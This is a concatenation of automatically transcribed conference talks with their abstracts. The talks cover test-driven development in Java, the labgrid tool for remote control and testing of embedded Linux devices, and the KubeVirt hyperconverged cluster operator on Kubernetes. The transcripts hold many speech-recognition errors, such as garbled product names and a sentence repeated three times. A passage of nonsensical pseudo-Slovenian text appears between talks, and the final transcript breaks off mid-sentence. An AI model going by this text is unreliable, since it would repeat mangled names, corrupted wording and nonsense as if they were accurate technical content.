ordered by average, right? And that's why we expect, again, we start with the assertions, right? So describing that the third repository called with that particular method, we want to return aspected fields. Can be the expected fields that we created in the previous servers, but we will continue now. So here, what we do is basically create this field, instantiate this field repository on the line 14. And we expect, again, the list of fields. So for having more visibility, I use the similar fields that we use on the service side on the previous code. But now what I did is created a class that is used for these two methods, these two classes, right? So basically it's an object, it's an object model class that basically can hold those different, those different values, right? So it's going to be used here on the service side and also for the repository integration test side. And nothing more than that, basically we start this test, this test is going to call that method, but for sure when we run this test, the test is running the real implementation of the test, we don't want to mock that, right? And now we can see that this supported exception is, is throwing why? Because basically we don't have the real implementation. So let's go for the real implementation. For the real implementation on the repository side, we need to fill things at least in Java, which is basically introduce a few dependencies on the right hand side, you can see the build, how it was, how I changed and introduced some dependencies, including test container, which is a rice open source tool to use with containers and databases with Java projects. And also introduce few more, like introducing the driver for postgres, this is the database that you use, and also an open source pool, like is Hikari. Okay. And on the left hand side, this is the implementation of the test. So basically I have to get a data source that is the last method, and also I need to define a container that is a porous container that is the line 22, where I'm using a particular version of the image, and then I'm running and introducing a script, where is the descriptor of the database, right? With this particular approach, then I'm going to be able to connect to the database, but also I will need to implement that, right? So this is the implementation that I did on the, here's a big one, but basically what I'm doing is basically do a join, connecting to the database and getting all the information back from the database. At this point, this is basically going back to the database, selecting the information, parsing it properly, let's say by columns, and then getting back to the repository that is going to populate the list, as you can see on the line 20, is defined at the list, and then on the line 30, to 30, yeah, 32, we are going to process the results and then read one by one of the all the records and the results that we have, and then populate that list, okay? And this is the structure of the user. Basically we define three tables, one for films, one for users, one for ratings, and as you can see from the line 26 going down, you will see that we insert some users in the database, we insert some themes in the database, and also we insert some ratings, because ADS to see that if we, if we want, basically what we want to achieve is to see the average, no, the average rate by the films, and see which ones are the, let's say, the most rated based on a particular genre. So if you can see on the line 30 to 32, you will see these are the films, right? So we have matrix, star wars, and app, in this case, and on the last column, you will see all the genres. You can see that matrix has science fiction, thriller and action, also star wars has science fiction, adventures and fantasy, but well, but, but app doesn't have anything related with science fiction. So app should not be written, and if you have a look on the, on the ratings part, you will see that ratings, and we have, for example, matrix has a eight, nine, and eight, so probably the average will be kind of a eight, eight and a half or something like this, eight point eight point five, while a star wars has only one vote, that is seven. So apparently the order has to be first the matrix, and then star wars, if I'm not wrong. So in the last one, because app, app is not already, will not be written or should not be written, because it doesn't have no the, the science fiction genre. That's more or less the idea. Okay, so this is the structure on the left hand side, we have the structure on the right hand side, we have the select, but basically we, we throw the select to the database, and we try to parse the results back, and basically return it to the, to the repository. And that's, that's the results that we get. So basically, after running this, applying the structure, the, the structure, defining the structure, sorry, with populating something on the database, and then running the test again, with this, this particular implementation, we, we run it, and the result is this, we spec few things, but to be equal to something else, but there were not. Okay, there are something we are missing in basically is the implementation, the default methods that we need in the film side, on the class on the film right hand side, you can see it here, that are the methods that normally are used for comparing and seeing what's, what's the, let's say how different instances, instances of a particular object of film can be equal or not. So basically, we are implementing a common method that are defined in Java that basically gives you an idea of where to film is an equal, where I have to identify if there is there any difference, no, and also we implemented hash code into a string to see if the content is what we expect, let's say, or serialize the results as a beautiful C, a beautiful result. So basically to have a look on the, on the idea of how to, how to the representation of an instance looks like in, in, let's say, more fancy or more easy to understand way. If we run that test again, now the test is green. Okay, the result is green basically because we can be defined a complete and now the, the Java GBBM can understand how to compare to film objects and now understands that the elements are exactly the same because it has the same title, so it has the same list and order of tax and the similar thing to general and year. So that's why the result of this test is working. And at the end, now we have a full picture of a solution that is working and it is a bit of understanding. We only, you know, write few classes, but the result is really nice because at the end we have only, let's say two test work defined. One is a unit that is triggered everything, right? We started from the out of the system, just starting with the description of the server, with the matter of what we know. And then we go back into, go into the repository and then define the needs of the repository, including the films and the details of the films, but on the, on the, on the pure element we have only four, say four classes in production and three, three classes, let's say in, in, in the test site. But the result is really, really nice in terms of coverage. This is the one of the things that I would like to introduce because basically, because everything we wrote was covered by test, you can see the code coverage in this particular solution. It is not really fancy, but the amount of code that is covered by test is really amazing. It's about 23 lines of code, 83% of the lines are covered by test, which is in my opinion, really, really good. I don't, I don't have too much code coverage. Normally the project where I've been working in all of my, all of my experience. So that's the one of the best things that as a result of the, of this applying to the, you know, the results that we get are really fancy in terms of a particular percentage of code that is already working is already covered by this and the classes are already, let's say they do only the, the, the needs that we want to cover. Nothing, nothing, let's say external extra because of depending on the situation, right? So that's, that's a simple example I would like to show you a bit more bigger than is normally a TDD category. I would like to, let's say have a look on something that could be more related with a real example, more or less. Oh yeah. So let's go for the final recap and explain a few things that I would like to mention for you. So I will recommend a few content around it. You can see online a lot of, a lot of content related with the description of what, what it means to test, what is the test pyramid, for example, what is the difference between mocks and the stops. I didn't get into too much here, but I think it's interesting to understand the pure content around it. There are some also, some good practices around different technologies I put only to hear one about JavaScript and other about Java. And also I can recommend you definitely to have a look on those books. Xtreme Program is planed by KEMbeck. It's one of the, I think it was the first time that TDD appeared and has a nice intro with Xtreme Programming Practices, but it's more focused on Xtreme Programming Practices than TDD. So we want to have a look on TDD, probably the first, the best one is probably, I would say the TDD, a practical guide or the TDD by example, which is a basic intro and it's probably an ideal situation. But the second one is also a practical guide with more concrete and real examples with graphical user interfaces and things like that that could help you to understand more or less. And also the, the, the art of unique testing is also for C-Sharp developers, I would say, but it's really easy to read and really easy to understand all the process around it. So the final recap I will tell you is basically that I, I hope to be clear for you that I hope that TDD helps you to write code in a simpler and effective way. And yes, I know it's difficult to adapt and sometimes it's difficult to maintain this practice. So you have to keep in mind that and continue doing it. I think it's worth, worth to have you try and try to at least have a look. Your server will have less bugs. It means it's going to be easier to maintain and also probably your company or you, you will be also more eager to continue working that way. So yes, I hope you like some of the tips that I shared with you. Probably they could make your life easier. I hope so. And yes, I think one of the best things you can do is try to pair. I think it's going to help you a lot for this. And yes, the last thing is just you have to try again and again and again and again and practice again and again because this is, I think the best way to try to make it happen. So yeah, I think this is it. So time for questions. You have some. So yeah, thank you very much by the way.
Have you heard of TDD? Are you interested or familiar with this practice but have never been able to understand it? In this session I'd like to present the benefits of Test-Driven Development (TDD), explaing how it works and what the benefits are of using it. We will see in a more detailed approach this way of developing software, where our software is always built guided by tests. We will go over some history about TDD, which is the main process we must follow when we work with this mechanic and the rules that surround it. We will also list the main advantages and disadvantages that most developers who practice TDD find and whether the arguments in favour add up to more than those that subtract. Finally, we will review some good habits and practices when applying TDD and see how to do it step by step with a Java code example. At the end of the session, I hope attendees will have a wider understanding of what TDD is, what advantages it brings, why it is interesting to master it and also that you will take with you some tricks and good practices to be able to apply them in your day-to-day life when writing code.
10.5446/52813 (DOI)
you hello and welcome everybody welcome to my talk about the joint years of testing embedded Linux devices thank you for having me first let's start with an idea let's imagine you're an embedded Linux engineer and working on an embedded Linux device but it's not only you as one person working on one project but let's imagine you are 30 colleagues and working on at least 30 projects at the same time well that's what we do I work for Pengatronics we are an embedded Linux consultancy and we will do embedded Linux operating system development and we have customers throughout all industries so the hardware we are working on is really really diverse I'm the guy right in the front there pressing the shutter release on a smartphone Chris Fieger senior hardware developer at Pengatronics if you want to reach out for me just use my email address or find me on Twitter or GitHub well and my job is develop hardware for testing of embedded Linux devices so that we're able to find all these small bugs that may sneak in when my software colleagues do they daily do they their daily work what are we going to talk about today first let's start with a short overview why you may want to automate your embedded Linux lab next let's have a look on what lab grid is and how it works then I will have a short demo where I show some of the features of lab grid in action and I will close that with a lessons learned where I will provide you with some information on what we've learned in three years of using lab grids okay so what do you need to control an embedded Linux device well first of all you need your device in this talk most of the time called device under test and you will probably need some kind of power source and some kind of serial interface because still today your primary interface to talk to your bootloader or to your Linux kernel or users land is still serial interface at least that is a low-level one that you can always use and that will always give you control of your device even if things like network are not working then you will probably need some jupyos to control user buttons press a reset or switch the boot mode of your embedded CPU to something else then the mode that the hardware developer has initially set you probably want to have Ethernet connectivity on your device under test because it makes it much easier for you to make a quick turnaround and bring a new BSP and use image onto your device under test or boot it directly from network but yeah even if you're not doing that your device probably has Ethernet so there's a good chance that you will need this interface anyway and depending on what your device does there are a variety of other interfaces you may have to take care of like SD cards or USB sticks for mass storage or firmware updates USB as host or device as to be a gadget for some other device or as a host to interface with some kind of measurement technology or something like that cameras can for all the embedded guys out there and HDMI, ReB, DSi, MEP and whatever for graphical interfaces for graphical input or output if you are having a embedded device that has a display or is connected to a camera or something like that but thinking about that you could just put this device under test on your on your desk and you're good to go there's no need to actually have a remote controlled right well there are a few points that may be a good motivation for your lab automation or to start your lab automation first of all during development there are some tasks that you have to repeat over and over again like getting a micro SD card of out of your device on the test putting it into your card reader back into a device on the test and doing that you have to do some commands on your computer and well this tends to make well this tends to well at least I tend to make errors doing that over and over again and that starts to frustrate me and that's why I usually try to avoid this and that is where lab grid can definitely help you it can help you automate device bring up and device provisioning after you when you want to try a new BSP image that you have just built another thing that's often the problem for us is we only get this one device on the test and no more or maybe two and then we will maybe use one as a code spare and the other one as a production device or we have two colleagues working on the project then we'll need to have one device on a test for each colleague but most of the time there is not more so we want to be able to share or hardware between our colleagues because even if you're the only one working on a project full-time you may have to give some tasks to someone who is specialized in for example graphics or has to fix a bug in your bootloader and it's much easier to give them access to your hardware that's on your desk or somewhere in your lab than to move it physically to his desk and well if you have full remote control over your device on the test in your lab it doesn't really matter if though your device on the test is on your colleagues desk in the same room or somewhere down the hallway or in a in the storage room somewhere because it's super loud and super bulky or you can even work from home what's a nice thing inside a global pandemic at least for me and the last argument for lab automation is if you have such deep control over your device on the test you can also use your lab automation for continuous testing and you are not only able to test some software component or one software component at a time you are able to test it the full software stack from your low level bootloader stage up to your actual application running on your device on the test and you are able to test it on a real hardware and not on an emulation and we are using lab grid for that lab grid is a Python library and Python toolkit that helps you to automate your embedded Linux lab it's open-source license as LGPL 2.1 and you can find it on GitHub if you want to have a look into the documentation it's always rendered out from the master branch to labgrid.readthedocs.ail and maybe you want to have a look there while I'm talking to see if your lab hardware is already supported when we started designing lab grid like three and a half years ago what were our main design criteria well first of all we wanted to have a shared pool of hardware between interactive work so what our colleagues do and continuous testing and continuous integration jobs that run most of the time at night that helps us with the SCARs hardware we only have available but also makes debugging easier because you're always working the same environment as the tests do we actively decided again software components on our device on the test because we want to be able to test the actual release image our customer would build for their customer where no debugging and no testing tools should be included that's super duper stripped down and well without the need for any software component on the device on the test despite the Linux tools we just need to test these things we want to test yeah that's possible we wanted lab grid to be extendable so that could should not be in your way if your device and the test is in some way special or is different from the other ones that you already had before we didn't want to integrate a scheduler because our continuous integration already has one and as we are now shifting from Jenkins to GitLab for continuous integration well that pays out because that we can just use the GitLab scheduler and we're fine same for build system as a new consultancy we never know what's the next build system we have to use and since lab grid just needs the artifacts that are generated by the build system and this doesn't care about the actual build system we use we can use any build system our customer talks us into and last of all we didn't want to invent a new testing framework because this wheel has been invented a lot of times and there are already good ones out there so we really wanted to concentrate about the missing bits and that is bringing the testing framework to the actual hardware so let's get into how lab grid works lab grid as I said is an hardware abstraction layer of some sort so we have lab grid in the middle and below that obviously the hardware one abstract for example if you have a serial port that is connected via USB on your computer on the computer running some lab grid software component still we find to use that your serial port is connected to some network appliance with 16 plus ports no problem lab grid probably has a driver for that same for power switches there are drivers for already built cons commercially available power switches in lab grid but you could also just use one of the GPOs lab grid supports and while you are in power switch onto that lab grid has support for GPOs as I said you can use GPOs on your embedded Linux device or there's some other ways to get GPOs connected to lab grid via Ken Open or via one wire for example if you are device on the test is connected to a ethernet switch you can use SNMP to query the IP address of this device on the test to do an SSH connection to the device on the test for example lab grid has support for many USB storage devices for one-side mass storage so if you want to write an image to your SD card lab grid has support for that but we also have Android fastboot support so if your bootloader supports that you can use it to upload an image and we support a lot of bootstrapping mechanisms that are in in ROM code for your embedded CPU so you can upload your initial bootloader directly from there on the other side lab grid provides you with three different kinds of interfaces that is the way you use lab grid one thing is you have a command line interface this command line interface is what you use during interactive work for example if you want to switch a device on and get a command line in serial interface a console onto that device on the test you can just do that with lab grid client with the command line interface since lab grid is Python you can also use it to write short scripts for example if you have a problem that just occurs one in a few thousand boots well let lab grid do the heavy lifting and let lab grid do the few thousand boots and after that just let your script let your device stay in this error in a state and you can have a look on it and see what went wrong and the last thing is lab grid comes with a pie test plugin that allows you to write tests for your embedded hardware directly in Python in pie test like you would for any other software component you would test using pie test okay what's lab grids view of the world lab grid has a distributed architecture so we have a few software components that can run on different places or inside your lab network or if you want to can just run on one and the same machine and it's totally fine too so first you have your lab grid client that can be your command line interface your script or even the pie test those can run on any machine on your network as long as they can reach the coordinator that's a tool that keeps track of the current state of your lab and the clients have to reach the exporters because the exporters are the devices where the actual lab automation hardware is connected to and the exporters tell the coordinator about the state of the connected lab automation hardware and so your client knows which hardware is available on much yeah so all these lab automation hardware here are called resources in lab grid and you can group resources to a logical unit and those are called places in lab grid and usually you take all those lab automation devices you need to control one device on the test that is called a target in lab grid and bring them all together in one place you can then lock one of these places because lab grid has a way of locking resources and then you can work with this target using the resources attached to it okay and now let's switch over to the demo today's demo is built around two key components one is this raspberry pi that is machine running lab grid and that is machine that I'm currently locked into and this bigger bone black in combination with this spinning wheel assembly here that is our device on the test the other two components here is a generally proposed input output that we can control via chem and in turn this generally proposed input output drives a relay that then switches power to a bigger bone black so this is a fancy can controllable power switch on our demo and this is a USB SD max this device has a micro SD card on the bottom side here and this micro SD card can be switched between our test server you're connected by a USB and our device on the test right here so what's lab grids view on this assembly lab grids sees four resources on this demo one is the PO device that we use to switch our power later on one is the USB SD max device and a USB mastodorch device that may can be that can be used to represent the micro SD card once it's connected to our test server and a USB serial device because we are connected to the debug serial of a bigger bone black right here and that is one of the other USB connections we see right here okay I have set up one place in lab grid that connects all these resources logically together it's called motor bone because bigger bone black and something with motor and let's have a more detailed look on in what's what's inside this place there's a lot of output regarding the current state that's not so important right now but I will see this place matches three of our four resources that is mainly because I realized you do not need that USB mass storage because the USB is demux device already provides you with a mass storage so I don't need to select the USB mass storage but it's not important if it's not part of the place it's just there and nobody uses it uses it and we see that currently I have not locked this place so to interact with it the first thing I have to do is lock this place and now I can use lab grid in interactive mode for example I can use the configuration that I've written for testing later on to tell lab grid okay lab grid please yeah of course what I do now is I use this configuration file and the strategy that is it's coming with our test suit to tell lab grid okay lab grid please bring this device on the test into a known state and then boot it into the boot loader and give me a serial console once you've reached the boot loader so what lab grid does now is has switched the USB SD max to the host so we can write an image onto the SD card then we're going then we'll see the SD card switch back on the status at least here and afterwards we'll power on the bigger bone black that has that has happened now and the next step is that the bigger bone driver interrupts the auto boot of the boot loader and drops us into the interactive shell and I can now run commands inside the interactive shell of this boot loader and I don't have to care about how I get a new and working image onto my SD card so that's all batteries included in lab grid of course I do not need to tell lab grid to use a specific state if I already know this device is booted and I just want to have a quick look again I can just tell lab grid give me a console I don't care what stated currently is and again we are inside the boot loader you we can do the same with a linux shell because that is another state provided by our test suit but we would have to reflash the SD card and that takes a few seconds and I would rather like to show you some some other nifty things okay next thing I want to show you is scripting with lab grid I will now show you a script that will use the image that's currently on the SD card so we're not going to reflash it but afterwards we are going to switch or beat the bone black on again capture it in the boot loader and run a command in the boot loader and we assume that this command will return some specific string and if it doesn't we are going to quench so this should simulate that this command may has a bug and that we want to test the boot loader again and again and maybe one in a thousand times we're able to find this bug and afterwards we can have look onto the device and examine the current state so how does it work first I'm setting up my lab grid environment using the configuration file again and then I get then I make sure I have handles to all drivers that I will need later on and switch our USB SD mocks into the device under test mode and then our side click testing begins first we power on or bigger bone black we make sure we capture it in the boot loader once the boot loader starts we run the command check the output and if the return values are okay we are going to power our bigger bone back off and do the same again how does it look one running well first takes a short moment because we have to re-switch our USB SD mocks to the beaver bone black and afterwards we are roughly one in running one cycle a second pouring the bigger bone black on running this command checking the output and doing that again I will stop that now because even if we are going to running a thousand times I don't think that that we're going to hit a buck in this very simple command last station on today's demo road trip here is a test suit this test suit makes use of py test fixtures what is a cool py test feature that allows you to pre-define a dependency that you want to have inside a test so we can later on reference to a test to this fixture barebox shell and py test will make sure this fixture is run before the test runs so this fixture basically brings our device on a test into the barebox state and returns us a handle to the barebox shells so that we can run a command same for the Linux shell here and the last test here or the last fixture here is a fixture that brings us into the off state and that's a state where the power is switched off basically to stop this motor from spinning even if our tests have failed the tests themselves are easy we have test or again a tester that tests the barebox version command and we have the same for the Linux side where we where we test the uname minus a command if we are running the kernel we are thinking we should be running and the last three tests here are spinning our motor and what those tests do is we call a speed controller hey speed controller please drive this wheel to 50 pulses per second whatever speed that is and I can then interact with the wheel and slow it down and by doing that I can provoke a test to fail so let's provoke some failed tests I'll make it a little more of a both so we can see which tests are currently running okay first here we are again writing a new image to our SD card because let's assume we've just built a new PSP and afterwards we'll switch on our bigger bomb back and black and the first test in that a bootloader will run well basically immediately after switching it on and after that we'll boot into Linux okay SD card is on the bigger bomb black first test it has passed and now we are booting into Linux this is the first time the system boots because we have just a provision or SD card so we have to do a job slide generating SSA chose keys so this takes a few seconds longer than you would anticipate and okay the first test has passed and the first model test has passed and now I will now slow this wheel down and it will slow it down so far that our test will fail takes a few seconds because the speed controller ties to reach the z-set point anyway okay so this test has failed and now the next test will pass I guess yeah so switching it off and that concludes the demo part of today's talk okay and the last part of my talk for today I want to talk about the lessons we have learned developing and using lab grid for a little over three years by now first of all we decided to have one single hardware pool for interactive use and continuous integration and continuous testing that has proven to be a good idea actually you only need one set of hardware for whatever you want to do and it's really easy because if one of your tests fails and from time to time there is a good chance that the environment around your device on the test is actually part of the problem then you will do the debugging in the very same environment that your tests would have run what where your tests usually run so yeah that's just simply very convenient because it's so close to each other but you need to keep in mind if you want to be able to share a device on the test with your developer you never know what what what the last state was your developers loved your device on the test and so you may need to make sure that you are able to provision your device on a test from scratch that in our case usually means including flashing a new bootloader even if the old one is broken yeah you just have to make sure you have all the infrastructure in place to do that well yeah but lab grid has or your test suite has full control over your hardware so it's up to the test suite to flash a new bootloader or bring your device on the test to a specific boot mode and so on so that is totally possible and it also allows you to allow all head to handle all special or edge cases your device on the test may have for example if you want to test a firmware updates and you want to have a broken firmware image in one of your slots well just break it and see what your software does left grid allows custom code inside your test suits so you're totally free to write the support code you need and put it next to a test suit and you can still use ever no left grid no no need to upstream anything to left grid if you have any special use cases you want to use left grid for but again this adds complexity and you always have to keep in mind that left grid usually thinks that it will provision the device on the test from scratch one decision we made is these strategies I showed you in the demo are also usable for interactive work and for scripting as we have seen so you just have to do the heavy lifting once and then yeah you have in full control of your device on the test during interactive work and scripting and what I've called here reproducible workflows what I mean is since strategies are some kind of well documentation is code or code is documentation it's easier to hand over project to a colleague maybe if you have to call in or on vacation every colleague will be able to just boot your device at least and can take off from there and can have a look into the strategy to see what you've done left grid has USB support we support a variety of different USB devices well USB is easy to use and it's widely available there's well for every USB device you want to use there's one version with USB available for every lab device you want to use there's one version with USB available but after a few years of USB in all apps I have to say lab grid is a really really bad idea we have so many stability issues in our labs and even if you just got one or two USB devices connected to your test server which you've got one device on a test on your desk USB will fail you at some point a device will just have bugs will misbehave you will have USB hubs that cease to work or where a part of the USB hub ceases to work and resetting the USB device via USB is not enough to make it working again or you have USB serial adapters that are still available still controllable via USB but you can't get any serial data through and if you not only have one device on the test but in all apps it's usually 16 pair rec and we have 30 USB devices sometimes in a lab that really becomes a problem and it's really hard to debug so if you can don't use use USB wherever possible I've had a complete talk about the issues with USB at the automated testing summit 2019 so if you want to have a look the slides are on elinux.org we have decided against the schedule but we have a mechanism of locking and with a reservation mechanism so a developer can lock resources or lock a place and so can continuous testing and but continuous testing can also have a reservation well actually a developer can has a reservation too but don't think that is really used so yeah continuous integration continuous testing uses the method methods of locking and reservation and when one continuous testing job is already running on a device on the test the other has a reservation and will wait until the first finishes yeah so we don't need to reinvent a scheduler because continuous integration already has one but this relies on our developers to unlock their devices on the test when they when they finish work in the evening for continuous testing to run so we do not have a good technical solution for this social issue here so from time to time test simply don't run because our developer forgot to unlock their device on the test. Labgrid has a concept of dynamic resources that means a device can appear while a test suit is already running or while you have a script running for example if you switch your device on the test on and you boot a embedded CPU into boot from USB and your USB device will appear and Labgrid is able to handle that yeah as I said allows you to to wait for this devices to appear but also you know gives you some overhead because you your system needs to be capable Labgrid needs to be capable of handling that but that's already in software so well mostly upsides for us here. Labgrid's distributed architecture is a big plus for us we can access our devices on the test and from everywhere and we can share them so all devices on the test in our office are connected to one central lab coordinator and you can use them all no matter in which office you are and you can move all these noisy or large devices on the test out of your office obviously and well today you can also work from home because most of the time you do not need to sit next to your device on the test unless you're doing graphics development sorry for my graphics colleagues but having this distributed architecture with at least two services running on on different machines or multiple services running on multiple machines is complex and introduces a lot more moving parts and we really had to learn that error reporting in such a system is really really hard and often if something fails the job of identifying a real cause for an error is a manual debugging effort so one colleague that knows the test suite knows the infrastructure and knows it was on the test has to have a look on a really long Python stack trace to find out but what just happened and yeah that's sometimes annoying and tends to be one of the not so pleasant things that my colleagues always talk about okay but even with complexity and long Python stack traces we're still using lab grid and we will continue to because it really helps us in our day-to-day work and maybe you're interested to have a look into lab to or maybe you say nah I write my own hardware lab extraction abstraction layer then maybe our ideas on what our lessons learned to have our may help you yeah so I think there is a Q&A right now so let's switch over to there thank you for having me here and I'm really interested to hear your questions. you you you you you you you you
Embedded development is complex enough. By automating repetitive parts during development and employing testing, a lot of time can be saved and human errors avoided. Additionally, embedded development is usually a team effort: scarce hardware must often be shared between developers and sometimes even with automated testing. labgrid is an open source tool for remote control and testing of Embedded Linux Devices in a distributed lab. In this talk the presenter takes a look at how labgrid can be used in your Embedded lab and what labgrid's developers have learned in over three years of using and developing it. At first the presenter takes a closer look at what is actually needed to fully remote-control an Embedded Linux Device: What are the typical interfaces that need to be covered? What remote-control hardware is commercially available? Next the presenter will focus on the labgrid [0] framework. Labgrid is an embedded board control python library, with a focus on testing, development and general automation. After a short overview of the key design-concepts the presenter will discuss labgrid's architecture. This part finishes with a demo of how interactive development with labgrid looks like and how tests are implemented using pytest. The talk will conclude with a lessons-learned with the joy and tears of over three years of active labgrid development and use.
10.5446/52817 (DOI)
no temptingh pozosti calis. Je to crore, sono comply. Ale Rakčojne liste. Aw exclusive, the spraha. Na benti z tem se platiji Zen Tongpressrne smo na 맛있et Ishvenk pomeljenje, na pravati riskozke in v airlineo k creo, da naj se dobro populations pa je že očenine. I do n sodium in robim greni dlž, plague spolu Dragina Omagostil, in adot deljeva M3. Pate Gudamaey overlidne gnČs, norm Assessment Support results. 곳mi, in op writing isạnizavovasvrim colon??? 2. The resource is usually customer resource a controller, a which controls the assembler and the knowledge that is embedded into the cloud. So in general we can have standard kubernetes sources tudi in konfig maps, routes, ali tudi bi smo vsega vsega vsega vsega. Tudi bi smo vsega vsega vsega kubernej kontroljera, tudi replika, deplojment in even demo set. Tudi bi smo vsega vsega vsega vsega operatora. Tudi je to, da smo vsega vsega vsega. Tudi smo razplanjamo v tem kamerasti. V tom sem bilo objev potemjiz without kubernej napočenist. Ne spravalneg assignment, robbed, tudi nekišno posebne v remiférni believes in zelo viž boj over odesạ interface pa del soldierspro trapped kot ste tomanje z v identît SVSL, Now let's go back to the operator model. As I said before, an operator is a controller. The general pattern is that we have customer tools where the user can define and modify over the time a desired state. The controller, which is a piece of software, gets notified about changes via informer's pattern. The controller is then running the reconcile logic that according to a new desired state, it's going to make the world looking as desired. So over the time or starting from user changes, in the primary, watch the customer source, the controller is periodically going to reconcile, eventually running it again with a Q system to be able to handle errors, a set of resources in the external world, which is our cluster. At the end, the controller is also supposed to report back status to the end user, updating the status sub-resource on the customer source that we are introducing. I also said that we need a bit of logic, of knowledge of what we can do. We are going to call them the domain or application specific knowledge. This is required to be able to install, to upgrade, to self, to eventually self-heal in case of failures, to properly scale, to clean up if the user for any reason decided to remove our product, to keep it up to date, eventually to take the apps, to install them, and so on. All of these features should be automated by a piece of software called the operator. So an operator is based on Kubernetes resources and controller concepts, it includes domain or application specific knowledge to be able to automate common tasks. Why does it matter? We want as a service platform experience. We want to build an ecosystem of software and Kubernetes that can be as easy, as safe and as reliable to be used and operate as a cloud service. We want to be able to introduce something with low touch, eventually even remotely managed, one click updates. In order to do that, an operator by itself is not enough and we need also to have another component, which is going to take care of the world lifecycle of our operator. This component, which is shipped by default in OpenShift, but you can also install it on Play Kubernetes, is called the operator lifecycle manager, or the OLM. The OLM extends Kubernetes in order to provide a declarative way to install, manage and upgrade operators and their dependencies in your cluster. The operator lifecycle manager provides an after life experience for discovering and distroling operators. It also provides automated upgrade for operators with a mechanism called OLM channels, where you can have more than one or different upgrade streams. It also provides a framework for building rich and usable user interfaces. In addition to the OLM, we also have the operator app that allows cluster administrators to select which operators they want to make available in their clusters to end users. The operator app is accessible only to cluster administrators, can be used to discover or to install all of optional components or application, and the cube virt is an optional component on Kubernetes and on OpenShift clusters. It can be used to consume an upstream or community project and can be also used for downstream offering. We can have multiple types of operators, something specific to that product, something to external partners, but also community operators. In our case, we are going to talk about a community operator. We have a real interesting project called the cube virt. Cube virt is managed by an operator, but in order to be able to operate on your cluster, it also needs additional operators to take care of other components like the networking, the storage, and so on. All of them should be orchestrated. Cube virt is a kind of extension of Kubernetes that lets you run your virtual machines as native objects in Kubernetes or in OpenShift. What we want to achieve now is the ability to install cube virt with a single click from the operator app. So we are starting from the cube virt project, and we want to have something that can be installed as easy as you can install an app on yourself. The cube virt project under the cube virt organization, we have more than one component, we have multiple components, and so we have multiple operators. We have the cube virt operator regarding all the core virtualization features. We have another operator called a containerized data import, or CDI, which is used to import the source of the persistent volume that you are going to use for your virtual machines. We have a networking specific operator, we have another operator that acts regarding scheduling, scaling, performance. We have a special operator that you can use when you need to set the maintenance and so on. We have another operator user that we import virtual machine from external systems. All of them are different projects under cube virt organization on GitHub. So in a few minutes before I was talking about OLM and its ability to install an operator, but here we have more than one operator, and now we need to understand how we can easily install all of them with a single click. So the main requirement is that we want a single installable unit. So the first question is if we want to rely on the dependency management mechanism provided by OLM out of the box, or if we need something more for a granted. We don't want to enter into the details, but I can already tell that unfortunately in order to ship a product, we need to do something really for a granted. So the idea that the user is able to install one component operator by one from the OLM is not really feasible or is not going to provide vatenize that the user experience that we are looking for. Let's imagine also the upgrade. The user doesn't want to separately upgrade the network part of the storage one regardless of the virtualization with version mismatch or conflicts or whatever. We want to provide a single upgrade path. Then we want to provide it to the user a single entry point to configure the word product. We don't want to ask to the user to create more than one customer source to configure or to start up the storage path, the network one, and so on. We want to have a single CR that is going to be used to start up and configure the world cubivirt product on your cluster. Of course, we need it integrated with the OLM. And our operator is also a special one because in general an operator is something that the cluster admin can enable on a cluster and then each user can choose to start it on a specific namespace. In our case, this is a bit different because cubivirt is going to ship an additional real important feature to operate an open shift cluster, which is the ability to run virtual machines. This basically is a specific control plane and we want to have just a single instance on that control plane on the world cluster. We don't have two objects that control virtual machines on your cluster at the same time. So in our case, we need a single atom operator. What is the solution to all this requirement? We start, we implemented a special operator called hyperconverged cluster operator. The goal of the hyperconverged cluster operator is to have a single endpoint for multiple operators. So cubivirt for call virtualization, the storage part, CBI, the networking one, et cetera, where the users can deploy and configure them as they are a single object. Then each sjovk doesn't replace the operator like cycle manager, it works with it. So HCO is a kind of operator of operators. No also no whether meta operator or umbrella operator. HCO provides also an opinionated deployment of a cubivirt and its sibling operators. HCO is the easiest way to install cubivirt on your cluster. How does it work? Here we have the user. The user is able, is going to look for and find the hyperconverged cluster operator into the operator app. So it's going to create a special object managed by VLM, which is a subscription. A subscription means that as a cluster admin, I want to configure my cluster to consume that specific operator. All of the components operator are shipped together into the artifact that is consumed by VLM. Operator is released to VLM as a special artifact called cluster service version, which contains all the information required to configure your cluster to be able to consume an operator. So all the rules, the service account, the deployments, the list of images and so on. We are going to provide VLM a single artifact, a single CSV and unify the CSV. This CSV is going to start all the operators, but the user is going to create a single customer source for the hyperconverged cluster operator. Then this special operator is waiting and it's watching the hyperconverged cluster operator customer source. When the user creates the customer source for the hyperconverged cluster operator with the configuration options that he wants to set on his cluster, it's now the hyperconverged cluster operator pod that it's going to create a different customer source for each one of the involved components operator. So the hyperconverged cluster operator will create a customer source that it's going to be watched by the VLM operator, another one that is going to be watched by the CDI operator and so on. The user is not supposed to directly see or edit the customer source for components operator, but only the top level or the special customer source for the hyperconverged cluster operator. Then it's HCO that it's going to mutator to set what the user set on the hyperconverged cluster operator. So the user is going to be watching the hyperconverged cluster operator. So the user is going to be watching the hyperconverged cluster operator. So the user is going to be watching the hyperconverged cluster operator. As I already said more than once, we have multiple operators here running on my cluster in order to be able to run cube viert, but from the VLM point of view, where the VLM is dealing with a single operator, but we have no operator that can independently fail, can be unavailable, can be involved in an upgrade and they are independent ports, so they can do that independently once on the other. Then VLM considers an application to be succeeded if all the ports are ready and the expected amount of the ports are present. And VLM is only aware of the operators that are directly listed in the cluster service version. So we have to introduce a kind of mechanism where hyperconverged cluster operator can control the status of the components operators, such as the storage one or the network one, aggregate the status and report it back to the VLM. VLM is waiting only for the ready status on ports, but we need to aggregate something more detailed. So we are not using only VLM developers, we are not using only veridinez props, but we are also using conditions. Conditions are the latest available observation of an object state. It's a kind of common pattern in Kubernetes and it's basically an extension mechanism intended to be used when the details of the observation are not known at priori, cannot be implied on all the instances of a specific kind. The idea is that we want to use conditions that can be independently set by each operator on HCR to determine what we need to report back from HCR pod to VLM. We are talking about more than one condition, because we can have multiple conditions for different things that we need to consider. In particular we need to check the availability, we need to check if an operator is progressing or to update something to a different status of if an operator reports that it's degraded. So we are aggregating that three conditions where a full matrix where the three independent conditions combined together reports a different meaning. The expected status is to have available equal to progressing false and degraded equal false. This means that we assure that all the components operator are 100% healthy and the operator is idle. Then of course we can have all the possible conditions with different meanings. According to this matrix HCO is going to set its readiness probe to communicate with VLM. But as I said HCO is not just reporting its own conditions to VLM. It needs to continuously check conditions reported by components operators. That's why we also have an aggregation mechanism that with a bit of logic. It's the logic that I was talking before when we need that an operator should embed the logic and the knowledge about application details. This is the flow that we need to consider when 